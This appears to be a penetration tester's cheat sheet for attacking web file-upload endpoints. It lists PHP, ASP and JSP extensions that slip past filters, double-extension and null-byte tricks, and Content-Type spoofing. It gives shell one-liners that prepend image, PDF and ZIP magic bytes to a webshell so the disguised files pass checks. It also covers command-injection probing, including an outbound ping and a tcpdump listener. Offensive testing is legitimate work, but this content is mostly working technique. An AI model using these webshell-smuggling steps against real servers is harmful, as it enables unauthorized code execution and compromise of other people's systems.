User Endpoints

File Upload Filtering

Executable extensions

.php -> Standard extension for PHP scripts.

.php5 -> Used for PHP version 5 scripts.

.phtml -> PHP scripts with an alternative extension, often for compatibility or aesthetic reasons.

.pht -> Less common extension, used for PHP files; sometimes bypasses naive filters.

.phps -> Typically used for PHP source code highlighting.

.php3 -> Extension for older PHP 3 scripts; still valid in some configurations.

.asp -> Active Server Pages, Microsoft’s server-side scripting technology.

.aspx -> Advanced ASP.NET pages used for dynamic web content on Microsoft platforms.

.jsp -> Java Server Pages, used for dynamic web applications in Java environments.

Test filters

• There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:

• File extension :

  • Double extensions:

    • .png.php, .jpg.php, .png.asp, .gif.jsp

  • Null byte injection:

    • file.php%00.jpg, file.asp%00.png

• Content-Type headers:

  • Executable types:

    • application/x-php

    • application/x-sh

    • application/x-msdownload

    • application/x-python-code

  • Image Types:

    • image/png,image/jpeg, image/gif, image/bmp, image/svg+xml

  • MIME Confusion:

    • text/html instead of application/json

    • text/plain to trick servers.

• Magic bytes (file signature)

  • Online hex editor -> HexED.it

PNG

echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png

JPEG

echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg

GIF

echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif

PDF

echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf

ZIP

echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip

Check Input Sanitation/Validation

• Submit especial characters in the request -> !@$%^&

• In Linux IP addresses can be written in decimal and HEX, this can be useful if dots are blacklisted.

Prove the Injection

• If you find a command injection, test whether the system can establish outbound connections to an external server:

ping+10.10.10.10

• And wait for it with tcpdump:

tcpdump -i tun0 icmp